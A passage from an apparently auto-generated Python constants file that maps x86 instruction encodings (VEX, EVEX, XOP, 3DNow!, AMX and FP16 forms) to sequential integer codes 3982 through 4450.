VEX_VPCMPISTRI_XMM_XMMM128_IMM8: int = 3982
EVEX_VFPCLASSPS_KR_K1_XMMM128B32_IMM8: int = 3983
EVEX_VFPCLASSPS_KR_K1_YMMM256B32_IMM8: int = 3984
EVEX_VFPCLASSPS_KR_K1_ZMMM512B32_IMM8: int = 3985
EVEX_VFPCLASSPD_KR_K1_XMMM128B64_IMM8: int = 3986
EVEX_VFPCLASSPD_KR_K1_YMMM256B64_IMM8: int = 3987
EVEX_VFPCLASSPD_KR_K1_ZMMM512B64_IMM8: int = 3988
EVEX_VFPCLASSSS_KR_K1_XMMM32_IMM8: int = 3989
EVEX_VFPCLASSSD_KR_K1_XMMM64_IMM8: int = 3990
VEX_VFMADDPS_XMM_XMM_XMMM128_XMM: int = 3991
VEX_VFMADDPS_YMM_YMM_YMMM256_YMM: int = 3992
VEX_VFMADDPS_XMM_XMM_XMM_XMMM128: int = 3993
VEX_VFMADDPS_YMM_YMM_YMM_YMMM256: int = 3994
VEX_VFMADDPD_XMM_XMM_XMMM128_XMM: int = 3995
VEX_VFMADDPD_YMM_YMM_YMMM256_YMM: int = 3996
VEX_VFMADDPD_XMM_XMM_XMM_XMMM128: int = 3997
VEX_VFMADDPD_YMM_YMM_YMM_YMMM256: int = 3998
VEX_VFMADDSS_XMM_XMM_XMMM32_XMM: int = 3999
VEX_VFMADDSS_XMM_XMM_XMM_XMMM32: int = 4000
VEX_VFMADDSD_XMM_XMM_XMMM64_XMM: int = 4001
VEX_VFMADDSD_XMM_XMM_XMM_XMMM64: int = 4002
VEX_VFMSUBPS_XMM_XMM_XMMM128_XMM: int = 4003
VEX_VFMSUBPS_YMM_YMM_YMMM256_YMM: int = 4004
VEX_VFMSUBPS_XMM_XMM_XMM_XMMM128: int = 4005
VEX_VFMSUBPS_YMM_YMM_YMM_YMMM256: int = 4006
VEX_VFMSUBPD_XMM_XMM_XMMM128_XMM: int = 4007
VEX_VFMSUBPD_YMM_YMM_YMMM256_YMM: int = 4008
VEX_VFMSUBPD_XMM_XMM_XMM_XMMM128: int = 4009
VEX_VFMSUBPD_YMM_YMM_YMM_YMMM256: int = 4010
VEX_VFMSUBSS_XMM_XMM_XMMM32_XMM: int = 4011
VEX_VFMSUBSS_XMM_XMM_XMM_XMMM32: int = 4012
VEX_VFMSUBSD_XMM_XMM_XMMM64_XMM: int = 4013
VEX_VFMSUBSD_XMM_XMM_XMM_XMMM64: int = 4014
EVEX_VPSHLDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4015
EVEX_VPSHLDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4016
EVEX_VPSHLDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4017
EVEX_VPSHLDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4018
EVEX_VPSHLDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4019
EVEX_VPSHLDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4020
EVEX_VPSHLDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4021
EVEX_VPSHLDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4022
EVEX_VPSHLDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4023
EVEX_VPSHRDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4024
EVEX_VPSHRDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4025
EVEX_VPSHRDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4026
EVEX_VPSHRDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4027
EVEX_VPSHRDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4028
EVEX_VPSHRDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4029
EVEX_VPSHRDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4030
EVEX_VPSHRDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4031
EVEX_VPSHRDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4032
VEX_VFNMADDPS_XMM_XMM_XMMM128_XMM: int = 4033
VEX_VFNMADDPS_YMM_YMM_YMMM256_YMM: int = 4034
VEX_VFNMADDPS_XMM_XMM_XMM_XMMM128: int = 4035
VEX_VFNMADDPS_YMM_YMM_YMM_YMMM256: int = 4036
VEX_VFNMADDPD_XMM_XMM_XMMM128_XMM: int = 4037
VEX_VFNMADDPD_YMM_YMM_YMMM256_YMM: int = 4038
VEX_VFNMADDPD_XMM_XMM_XMM_XMMM128: int = 4039
VEX_VFNMADDPD_YMM_YMM_YMM_YMMM256: int = 4040
VEX_VFNMADDSS_XMM_XMM_XMMM32_XMM: int = 4041
VEX_VFNMADDSS_XMM_XMM_XMM_XMMM32: int = 4042
VEX_VFNMADDSD_XMM_XMM_XMMM64_XMM: int = 4043
VEX_VFNMADDSD_XMM_XMM_XMM_XMMM64: int = 4044
VEX_VFNMSUBPS_XMM_XMM_XMMM128_XMM: int = 4045
VEX_VFNMSUBPS_YMM_YMM_YMMM256_YMM: int = 4046
VEX_VFNMSUBPS_XMM_XMM_XMM_XMMM128: int = 4047
VEX_VFNMSUBPS_YMM_YMM_YMM_YMMM256: int = 4048
VEX_VFNMSUBPD_XMM_XMM_XMMM128_XMM: int = 4049
VEX_VFNMSUBPD_YMM_YMM_YMMM256_YMM: int = 4050
VEX_VFNMSUBPD_XMM_XMM_XMM_XMMM128: int = 4051
VEX_VFNMSUBPD_YMM_YMM_YMM_YMMM256: int = 4052
VEX_VFNMSUBSS_XMM_XMM_XMMM32_XMM: int = 4053
VEX_VFNMSUBSS_XMM_XMM_XMM_XMMM32: int = 4054
VEX_VFNMSUBSD_XMM_XMM_XMMM64_XMM: int = 4055
VEX_VFNMSUBSD_XMM_XMM_XMM_XMMM64: int = 4056
SHA1RNDS4_XMM_XMMM128_IMM8: int = 4057
GF2P8AFFINEQB_XMM_XMMM128_IMM8: int = 4058
VEX_VGF2P8AFFINEQB_XMM_XMM_XMMM128_IMM8: int = 4059
VEX_VGF2P8AFFINEQB_YMM_YMM_YMMM256_IMM8: int = 4060
EVEX_VGF2P8AFFINEQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4061
EVEX_VGF2P8AFFINEQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4062
EVEX_VGF2P8AFFINEQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4063
GF2P8AFFINEINVQB_XMM_XMMM128_IMM8: int = 4064
VEX_VGF2P8AFFINEINVQB_XMM_XMM_XMMM128_IMM8: int = 4065
VEX_VGF2P8AFFINEINVQB_YMM_YMM_YMMM256_IMM8: int = 4066
EVEX_VGF2P8AFFINEINVQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4067
EVEX_VGF2P8AFFINEINVQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4068
EVEX_VGF2P8AFFINEINVQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4069
AESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4070
VEX_VAESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4071
VEX_RORX_R32_RM32_IMM8: int = 4072
VEX_RORX_R64_RM64_IMM8: int = 4073
XOP_VPMACSSWW_XMM_XMM_XMMM128_XMM: int = 4074
XOP_VPMACSSWD_XMM_XMM_XMMM128_XMM: int = 4075
XOP_VPMACSSDQL_XMM_XMM_XMMM128_XMM: int = 4076
XOP_VPMACSSDD_XMM_XMM_XMMM128_XMM: int = 4077
XOP_VPMACSSDQH_XMM_XMM_XMMM128_XMM: int = 4078
XOP_VPMACSWW_XMM_XMM_XMMM128_XMM: int = 4079
XOP_VPMACSWD_XMM_XMM_XMMM128_XMM: int = 4080
XOP_VPMACSDQL_XMM_XMM_XMMM128_XMM: int = 4081
XOP_VPMACSDD_XMM_XMM_XMMM128_XMM: int = 4082
XOP_VPMACSDQH_XMM_XMM_XMMM128_XMM: int = 4083
XOP_VPCMOV_XMM_XMM_XMMM128_XMM: int = 4084
XOP_VPCMOV_YMM_YMM_YMMM256_YMM: int = 4085
XOP_VPCMOV_XMM_XMM_XMM_XMMM128: int = 4086
XOP_VPCMOV_YMM_YMM_YMM_YMMM256: int = 4087
XOP_VPPERM_XMM_XMM_XMMM128_XMM: int = 4088
XOP_VPPERM_XMM_XMM_XMM_XMMM128: int = 4089
XOP_VPMADCSSWD_XMM_XMM_XMMM128_XMM: int = 4090
XOP_VPMADCSWD_XMM_XMM_XMMM128_XMM: int = 4091
XOP_VPROTB_XMM_XMMM128_IMM8: int = 4092
XOP_VPROTW_XMM_XMMM128_IMM8: int = 4093
XOP_VPROTD_XMM_XMMM128_IMM8: int = 4094
XOP_VPROTQ_XMM_XMMM128_IMM8: int = 4095
XOP_VPCOMB_XMM_XMM_XMMM128_IMM8: int = 4096
XOP_VPCOMW_XMM_XMM_XMMM128_IMM8: int = 4097
XOP_VPCOMD_XMM_XMM_XMMM128_IMM8: int = 4098
XOP_VPCOMQ_XMM_XMM_XMMM128_IMM8: int = 4099
XOP_VPCOMUB_XMM_XMM_XMMM128_IMM8: int = 4100
XOP_VPCOMUW_XMM_XMM_XMMM128_IMM8: int = 4101
XOP_VPCOMUD_XMM_XMM_XMMM128_IMM8: int = 4102
XOP_VPCOMUQ_XMM_XMM_XMMM128_IMM8: int = 4103
XOP_BLCFILL_R32_RM32: int = 4104
XOP_BLCFILL_R64_RM64: int = 4105
XOP_BLSFILL_R32_RM32: int = 4106
XOP_BLSFILL_R64_RM64: int = 4107
XOP_BLCS_R32_RM32: int = 4108
XOP_BLCS_R64_RM64: int = 4109
XOP_TZMSK_R32_RM32: int = 4110
XOP_TZMSK_R64_RM64: int = 4111
XOP_BLCIC_R32_RM32: int = 4112
XOP_BLCIC_R64_RM64: int = 4113
XOP_BLSIC_R32_RM32: int = 4114
XOP_BLSIC_R64_RM64: int = 4115
XOP_T1MSKC_R32_RM32: int = 4116
XOP_T1MSKC_R64_RM64: int = 4117
XOP_BLCMSK_R32_RM32: int = 4118
XOP_BLCMSK_R64_RM64: int = 4119
XOP_BLCI_R32_RM32: int = 4120
XOP_BLCI_R64_RM64: int = 4121
XOP_LLWPCB_R32: int = 4122
XOP_LLWPCB_R64: int = 4123
XOP_SLWPCB_R32: int = 4124
XOP_SLWPCB_R64: int = 4125
XOP_VFRCZPS_XMM_XMMM128: int = 4126
XOP_VFRCZPS_YMM_YMMM256: int = 4127
XOP_VFRCZPD_XMM_XMMM128: int = 4128
XOP_VFRCZPD_YMM_YMMM256: int = 4129
XOP_VFRCZSS_XMM_XMMM32: int = 4130
XOP_VFRCZSD_XMM_XMMM64: int = 4131
XOP_VPROTB_XMM_XMMM128_XMM: int = 4132
XOP_VPROTB_XMM_XMM_XMMM128: int = 4133
XOP_VPROTW_XMM_XMMM128_XMM: int = 4134
XOP_VPROTW_XMM_XMM_XMMM128: int = 4135
XOP_VPROTD_XMM_XMMM128_XMM: int = 4136
XOP_VPROTD_XMM_XMM_XMMM128: int = 4137
XOP_VPROTQ_XMM_XMMM128_XMM: int = 4138
XOP_VPROTQ_XMM_XMM_XMMM128: int = 4139
XOP_VPSHLB_XMM_XMMM128_XMM: int = 4140
XOP_VPSHLB_XMM_XMM_XMMM128: int = 4141
XOP_VPSHLW_XMM_XMMM128_XMM: int = 4142
XOP_VPSHLW_XMM_XMM_XMMM128: int = 4143
XOP_VPSHLD_XMM_XMMM128_XMM: int = 4144
XOP_VPSHLD_XMM_XMM_XMMM128: int = 4145
XOP_VPSHLQ_XMM_XMMM128_XMM: int = 4146
XOP_VPSHLQ_XMM_XMM_XMMM128: int = 4147
XOP_VPSHAB_XMM_XMMM128_XMM: int = 4148
XOP_VPSHAB_XMM_XMM_XMMM128: int = 4149
XOP_VPSHAW_XMM_XMMM128_XMM: int = 4150
XOP_VPSHAW_XMM_XMM_XMMM128: int = 4151
XOP_VPSHAD_XMM_XMMM128_XMM: int = 4152
XOP_VPSHAD_XMM_XMM_XMMM128: int = 4153
XOP_VPSHAQ_XMM_XMMM128_XMM: int = 4154
XOP_VPSHAQ_XMM_XMM_XMMM128: int = 4155
XOP_VPHADDBW_XMM_XMMM128: int = 4156
XOP_VPHADDBD_XMM_XMMM128: int = 4157
XOP_VPHADDBQ_XMM_XMMM128: int = 4158
XOP_VPHADDWD_XMM_XMMM128: int = 4159
XOP_VPHADDWQ_XMM_XMMM128: int = 4160
XOP_VPHADDDQ_XMM_XMMM128: int = 4161
XOP_VPHADDUBW_XMM_XMMM128: int = 4162
XOP_VPHADDUBD_XMM_XMMM128: int = 4163
XOP_VPHADDUBQ_XMM_XMMM128: int = 4164
XOP_VPHADDUWD_XMM_XMMM128: int = 4165
XOP_VPHADDUWQ_XMM_XMMM128: int = 4166
XOP_VPHADDUDQ_XMM_XMMM128: int = 4167
XOP_VPHSUBBW_XMM_XMMM128: int = 4168
XOP_VPHSUBWD_XMM_XMMM128: int = 4169
XOP_VPHSUBDQ_XMM_XMMM128: int = 4170
XOP_BEXTR_R32_RM32_IMM32: int = 4171
XOP_BEXTR_R64_RM64_IMM32: int = 4172
XOP_LWPINS_R32_RM32_IMM32: int = 4173
XOP_LWPINS_R64_RM32_IMM32: int = 4174
XOP_LWPVAL_R32_RM32_IMM32: int = 4175
XOP_LWPVAL_R64_RM32_IMM32: int = 4176
D3NOW_PI2FW_MM_MMM64: int = 4177
D3NOW_PI2FD_MM_MMM64: int = 4178
D3NOW_PF2IW_MM_MMM64: int = 4179
D3NOW_PF2ID_MM_MMM64: int = 4180
D3NOW_PFRCPV_MM_MMM64: int = 4181
D3NOW_PFRSQRTV_MM_MMM64: int = 4182
D3NOW_PFNACC_MM_MMM64: int = 4183
D3NOW_PFPNACC_MM_MMM64: int = 4184
D3NOW_PFCMPGE_MM_MMM64: int = 4185
D3NOW_PFMIN_MM_MMM64: int = 4186
D3NOW_PFRCP_MM_MMM64: int = 4187
D3NOW_PFRSQRT_MM_MMM64: int = 4188
D3NOW_PFSUB_MM_MMM64: int = 4189
D3NOW_PFADD_MM_MMM64: int = 4190
D3NOW_PFCMPGT_MM_MMM64: int = 4191
D3NOW_PFMAX_MM_MMM64: int = 4192
D3NOW_PFRCPIT1_MM_MMM64: int = 4193
D3NOW_PFRSQIT1_MM_MMM64: int = 4194
D3NOW_PFSUBR_MM_MMM64: int = 4195
D3NOW_PFACC_MM_MMM64: int = 4196
D3NOW_PFCMPEQ_MM_MMM64: int = 4197
D3NOW_PFMUL_MM_MMM64: int = 4198
D3NOW_PFRCPIT2_MM_MMM64: int = 4199
D3NOW_PMULHRW_MM_MMM64: int = 4200
D3NOW_PSWAPD_MM_MMM64: int = 4201
D3NOW_PAVGUSB_MM_MMM64: int = 4202
RMPADJUST: int = 4203
RMPUPDATE: int = 4204
PSMASH: int = 4205
PVALIDATEW: int = 4206
PVALIDATED: int = 4207
PVALIDATEQ: int = 4208
SERIALIZE: int = 4209
XSUSLDTRK: int = 4210
XRESLDTRK: int = 4211
INVLPGBW: int = 4212
INVLPGBD: int = 4213
INVLPGBQ: int = 4214
TLBSYNC: int = 4215
PREFETCHRESERVED3_M8: int = 4216
PREFETCHRESERVED4_M8: int = 4217
PREFETCHRESERVED5_M8: int = 4218
PREFETCHRESERVED6_M8: int = 4219
PREFETCHRESERVED7_M8: int = 4220
UD0: int = 4221
VMGEXIT: int = 4222
GETSECQ: int = 4223
VEX_LDTILECFG_M512: int = 4224
VEX_TILERELEASE: int = 4225
VEX_STTILECFG_M512: int = 4226
VEX_TILEZERO_TMM: int = 4227
VEX_TILELOADDT1_TMM_SIBMEM: int = 4228
VEX_TILESTORED_SIBMEM_TMM: int = 4229
VEX_TILELOADD_TMM_SIBMEM: int = 4230
VEX_TDPBF16PS_TMM_TMM_TMM: int = 4231
VEX_TDPBUUD_TMM_TMM_TMM: int = 4232
VEX_TDPBUSD_TMM_TMM_TMM: int = 4233
VEX_TDPBSUD_TMM_TMM_TMM: int = 4234
VEX_TDPBSSD_TMM_TMM_TMM: int = 4235
FNSTDW_AX: int = 4236
FNSTSG_AX: int = 4237
RDSHR_RM32: int = 4238
WRSHR_RM32: int = 4239
SMINT: int = 4240
DMINT: int = 4241
RDM: int = 4242
SVDC_M80_SREG: int = 4243
RSDC_SREG_M80: int = 4244
SVLDT_M80: int = 4245
RSLDT_M80: int = 4246
SVTS_M80: int = 4247
RSTS_M80: int = 4248
SMINT_0F7E: int = 4249
BB0_RESET: int = 4250
BB1_RESET: int = 4251
CPU_WRITE: int = 4252
CPU_READ: int = 4253
ALTINST: int = 4254
PAVEB_MM_MMM64: int = 4255
PADDSIW_MM_MMM64: int = 4256
PMAGW_MM_MMM64: int = 4257
PDISTIB_MM_M64: int = 4258
PSUBSIW_MM_MMM64: int = 4259
PMVZB_MM_M64: int = 4260
PMULHRW_MM_MMM64: int = 4261
PMVNZB_MM_M64: int = 4262
PMVLZB_MM_M64: int = 4263
PMVGEZB_MM_M64: int = 4264
PMULHRIW_MM_MMM64: int = 4265
PMACHRIW_MM_M64: int = 4266
CYRIX_D9D7: int = 4267
CYRIX_D9E2: int = 4268
FTSTP: int = 4269
CYRIX_D9E7: int = 4270
FRINT2: int = 4271
FRICHOP: int = 4272
CYRIX_DED8: int = 4273
CYRIX_DEDA: int = 4274
CYRIX_DEDC: int = 4275
CYRIX_DEDD: int = 4276
CYRIX_DEDE: int = 4277
FRINEAR: int = 4278
TDCALL: int = 4279
SEAMRET: int = 4280
SEAMOPS: int = 4281
SEAMCALL: int = 4282
AESENCWIDE128KL_M384: int = 4283
AESDECWIDE128KL_M384: int = 4284
AESENCWIDE256KL_M512: int = 4285
AESDECWIDE256KL_M512: int = 4286
LOADIWKEY_XMM_XMM: int = 4287
AESENC128KL_XMM_M384: int = 4288
AESDEC128KL_XMM_M384: int = 4289
AESENC256KL_XMM_M512: int = 4290
AESDEC256KL_XMM_M512: int = 4291
ENCODEKEY128_R32_R32: int = 4292
ENCODEKEY256_R32_R32: int = 4293
VEX_VBROADCASTSS_XMM_XMM: int = 4294
VEX_VBROADCASTSS_YMM_XMM: int = 4295
VEX_VBROADCASTSD_YMM_XMM: int = 4296
VMGEXIT_F2: int = 4297
UIRET: int = 4298
TESTUI: int = 4299
CLUI: int = 4300
STUI: int = 4301
SENDUIPI_R64: int = 4302
HRESET_IMM8: int = 4303
VEX_VPDPBUSD_XMM_XMM_XMMM128: int = 4304
VEX_VPDPBUSD_YMM_YMM_YMMM256: int = 4305
VEX_VPDPBUSDS_XMM_XMM_XMMM128: int = 4306
VEX_VPDPBUSDS_YMM_YMM_YMMM256: int = 4307
VEX_VPDPWSSD_XMM_XMM_XMMM128: int = 4308
VEX_VPDPWSSD_YMM_YMM_YMMM256: int = 4309
VEX_VPDPWSSDS_XMM_XMM_XMMM128: int = 4310
VEX_VPDPWSSDS_YMM_YMM_YMMM256: int = 4311
CCS_HASH_16: int = 4312
CCS_HASH_32: int = 4313
CCS_HASH_64: int = 4314
CCS_ENCRYPT_16: int = 4315
CCS_ENCRYPT_32: int = 4316
CCS_ENCRYPT_64: int = 4317
LKGS_RM16: int = 4318
LKGS_R32M16: int = 4319
LKGS_R64M16: int = 4320
ERETU: int = 4321
ERETS: int = 4322
EVEX_VADDPH_XMM_K1Z_XMM_XMMM128B16: int = 4323
EVEX_VADDPH_YMM_K1Z_YMM_YMMM256B16: int = 4324
EVEX_VADDPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4325
EVEX_VADDSH_XMM_K1Z_XMM_XMMM16_ER: int = 4326
EVEX_VCMPPH_KR_K1_XMM_XMMM128B16_IMM8: int = 4327
EVEX_VCMPPH_KR_K1_YMM_YMMM256B16_IMM8: int = 4328
EVEX_VCMPPH_KR_K1_ZMM_ZMMM512B16_IMM8_SAE: int = 4329
EVEX_VCMPSH_KR_K1_XMM_XMMM16_IMM8_SAE: int = 4330
EVEX_VCOMISH_XMM_XMMM16_SAE: int = 4331
EVEX_VCVTDQ2PH_XMM_K1Z_XMMM128B32: int = 4332
EVEX_VCVTDQ2PH_XMM_K1Z_YMMM256B32: int = 4333
EVEX_VCVTDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4334
EVEX_VCVTPD2PH_XMM_K1Z_XMMM128B64: int = 4335
EVEX_VCVTPD2PH_XMM_K1Z_YMMM256B64: int = 4336
EVEX_VCVTPD2PH_XMM_K1Z_ZMMM512B64_ER: int = 4337
EVEX_VCVTPH2DQ_XMM_K1Z_XMMM64B16: int = 4338
EVEX_VCVTPH2DQ_YMM_K1Z_XMMM128B16: int = 4339
EVEX_VCVTPH2DQ_ZMM_K1Z_YMMM256B16_ER: int = 4340
EVEX_VCVTPH2PD_XMM_K1Z_XMMM32B16: int = 4341
EVEX_VCVTPH2PD_YMM_K1Z_XMMM64B16: int = 4342
EVEX_VCVTPH2PD_ZMM_K1Z_XMMM128B16_SAE: int = 4343
EVEX_VCVTPH2PSX_XMM_K1Z_XMMM64B16: int = 4344
EVEX_VCVTPH2PSX_YMM_K1Z_XMMM128B16: int = 4345
EVEX_VCVTPH2PSX_ZMM_K1Z_YMMM256B16_SAE: int = 4346
EVEX_VCVTPH2QQ_XMM_K1Z_XMMM32B16: int = 4347
EVEX_VCVTPH2QQ_YMM_K1Z_XMMM64B16: int = 4348
EVEX_VCVTPH2QQ_ZMM_K1Z_XMMM128B16_ER: int = 4349
EVEX_VCVTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4350
EVEX_VCVTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4351
EVEX_VCVTPH2UDQ_ZMM_K1Z_YMMM256B16_ER: int = 4352
EVEX_VCVTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4353
EVEX_VCVTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4354
EVEX_VCVTPH2UQQ_ZMM_K1Z_XMMM128B16_ER: int = 4355
EVEX_VCVTPH2UW_XMM_K1Z_XMMM128B16: int = 4356
EVEX_VCVTPH2UW_YMM_K1Z_YMMM256B16: int = 4357
EVEX_VCVTPH2UW_ZMM_K1Z_ZMMM512B16_ER: int = 4358
EVEX_VCVTPH2W_XMM_K1Z_XMMM128B16: int = 4359
EVEX_VCVTPH2W_YMM_K1Z_YMMM256B16: int = 4360
EVEX_VCVTPH2W_ZMM_K1Z_ZMMM512B16_ER: int = 4361
EVEX_VCVTPS2PHX_XMM_K1Z_XMMM128B32: int = 4362
EVEX_VCVTPS2PHX_XMM_K1Z_YMMM256B32: int = 4363
EVEX_VCVTPS2PHX_YMM_K1Z_ZMMM512B32_ER: int = 4364
EVEX_VCVTQQ2PH_XMM_K1Z_XMMM128B64: int = 4365
EVEX_VCVTQQ2PH_XMM_K1Z_YMMM256B64: int = 4366
EVEX_VCVTQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4367
EVEX_VCVTSD2SH_XMM_K1Z_XMM_XMMM64_ER: int = 4368
EVEX_VCVTSH2SD_XMM_K1Z_XMM_XMMM16_SAE: int = 4369
EVEX_VCVTSH2SI_R32_XMMM16_ER: int = 4370
EVEX_VCVTSH2SI_R64_XMMM16_ER: int = 4371
EVEX_VCVTSH2SS_XMM_K1Z_XMM_XMMM16_SAE: int = 4372
EVEX_VCVTSH2USI_R32_XMMM16_ER: int = 4373
EVEX_VCVTSH2USI_R64_XMMM16_ER: int = 4374
EVEX_VCVTSI2SH_XMM_XMM_RM32_ER: int = 4375
EVEX_VCVTSI2SH_XMM_XMM_RM64_ER: int = 4376
EVEX_VCVTSS2SH_XMM_K1Z_XMM_XMMM32_ER: int = 4377
EVEX_VCVTTPH2DQ_XMM_K1Z_XMMM64B16: int = 4378
EVEX_VCVTTPH2DQ_YMM_K1Z_XMMM128B16: int = 4379
EVEX_VCVTTPH2DQ_ZMM_K1Z_YMMM256B16_SAE: int = 4380
EVEX_VCVTTPH2QQ_XMM_K1Z_XMMM32B16: int = 4381
EVEX_VCVTTPH2QQ_YMM_K1Z_XMMM64B16: int = 4382
EVEX_VCVTTPH2QQ_ZMM_K1Z_XMMM128B16_SAE: int = 4383
EVEX_VCVTTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4384
EVEX_VCVTTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4385
EVEX_VCVTTPH2UDQ_ZMM_K1Z_YMMM256B16_SAE: int = 4386
EVEX_VCVTTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4387
EVEX_VCVTTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4388
EVEX_VCVTTPH2UQQ_ZMM_K1Z_XMMM128B16_SAE: int = 4389
EVEX_VCVTTPH2UW_XMM_K1Z_XMMM128B16: int = 4390
EVEX_VCVTTPH2UW_YMM_K1Z_YMMM256B16: int = 4391
EVEX_VCVTTPH2UW_ZMM_K1Z_ZMMM512B16_SAE: int = 4392
EVEX_VCVTTPH2W_XMM_K1Z_XMMM128B16: int = 4393
EVEX_VCVTTPH2W_YMM_K1Z_YMMM256B16: int = 4394
EVEX_VCVTTPH2W_ZMM_K1Z_ZMMM512B16_SAE: int = 4395
EVEX_VCVTTSH2SI_R32_XMMM16_SAE: int = 4396
EVEX_VCVTTSH2SI_R64_XMMM16_SAE: int = 4397
EVEX_VCVTTSH2USI_R32_XMMM16_SAE: int = 4398
EVEX_VCVTTSH2USI_R64_XMMM16_SAE: int = 4399
EVEX_VCVTUDQ2PH_XMM_K1Z_XMMM128B32: int = 4400
EVEX_VCVTUDQ2PH_XMM_K1Z_YMMM256B32: int = 4401
EVEX_VCVTUDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4402
EVEX_VCVTUQQ2PH_XMM_K1Z_XMMM128B64: int = 4403
EVEX_VCVTUQQ2PH_XMM_K1Z_YMMM256B64: int = 4404
EVEX_VCVTUQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4405
EVEX_VCVTUSI2SH_XMM_XMM_RM32_ER: int = 4406
EVEX_VCVTUSI2SH_XMM_XMM_RM64_ER: int = 4407
EVEX_VCVTUW2PH_XMM_K1Z_XMMM128B16: int = 4408
EVEX_VCVTUW2PH_YMM_K1Z_YMMM256B16: int = 4409
EVEX_VCVTUW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4410
EVEX_VCVTW2PH_XMM_K1Z_XMMM128B16: int = 4411
EVEX_VCVTW2PH_YMM_K1Z_YMMM256B16: int = 4412
EVEX_VCVTW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4413
EVEX_VDIVPH_XMM_K1Z_XMM_XMMM128B16: int = 4414
EVEX_VDIVPH_YMM_K1Z_YMM_YMMM256B16: int = 4415
EVEX_VDIVPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4416
EVEX_VDIVSH_XMM_K1Z_XMM_XMMM16_ER: int = 4417
EVEX_VFCMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4418
EVEX_VFCMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4419
EVEX_VFCMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4420
EVEX_VFMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4421
EVEX_VFMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4422
EVEX_VFMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4423
EVEX_VFCMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4424
EVEX_VFMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4425
EVEX_VFCMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4426
EVEX_VFCMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4427
EVEX_VFCMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4428
EVEX_VFMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4429
EVEX_VFMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4430
EVEX_VFMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4431
EVEX_VFCMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4432
EVEX_VFMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4433
EVEX_VFMADDSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4434
EVEX_VFMADDSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4435
EVEX_VFMADDSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4436
EVEX_VFMADDSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4437
EVEX_VFMADDSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4438
EVEX_VFMADDSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4439
EVEX_VFMADDSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4440
EVEX_VFMADDSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4441
EVEX_VFMADDSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4442
EVEX_VFMSUBADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4443
EVEX_VFMSUBADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4444
EVEX_VFMSUBADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4445
EVEX_VFMSUBADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4446
EVEX_VFMSUBADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4447
EVEX_VFMSUBADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4448
EVEX_VFMSUBADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4449
EVEX_VFMSUBADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4450
